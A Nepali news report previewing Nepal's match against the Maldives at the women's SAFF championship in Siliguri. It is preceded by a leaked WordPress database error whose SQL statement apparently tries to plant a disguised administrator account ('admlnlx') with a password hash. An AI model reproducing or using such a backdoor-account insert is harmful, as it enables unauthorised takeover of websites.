WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwjfMrLOnMVaF8DbA0jynyahKRMXDJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:23:10', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १३–
भारतको सिलगुढीमा जारी चौथो दक्षिण एसियाली महिला फुटबल (साफ) प्रतियोगितामा आज (बुधबार) नेपाल र माल्दिभ्स भिड्दै छन् । प्रतियोगिताको दोस्रो खेलमा आज साँझ ६ बजे कञ्चनजंगा खेल मैदानमा माल्दिभ्ससँग नेपालले खेल्ने लागेको हो ।
पहिलो खेलमा नेपालले भुटानलाई ८–० को फराकिलो अन्तरले पराजित गरेको थियो । नेपालले पहिलो साफ च्याम्पियनसिपमा माल्दिभ्सलाई ६–० ले समूह चरणमा पराजित गरेको थियो।
सन् २०१२ मा पनि नेपालले माल्दिभ्सलाई ५–० ले पराजित गरेको थियो।
माल्दिभ्सलाई हराउने आत्मविश्वासका साथ नेपाल मैदान प्रवेश गर्दैछ भने माल्दिभ्स त्यसको बदला लिने योजनामा छ । टिमका प्रशिक्षक कुमार थापाले खेल जित्ने विश्वास व्यक्त गरे।
प्रतियोगितामा माल्दिभ्सले पहिलो खेलमा श्रीलंकालाई सोमबार ५–२ पराजित गरेको थियो । प्रतियोगिताको समूह ए मा नेपाल, माल्दिभ्स, श्रीलंका र भुटान छन्। नेपाल ३ पटक नै उपविजेतामा चित्त बुझाएको छ।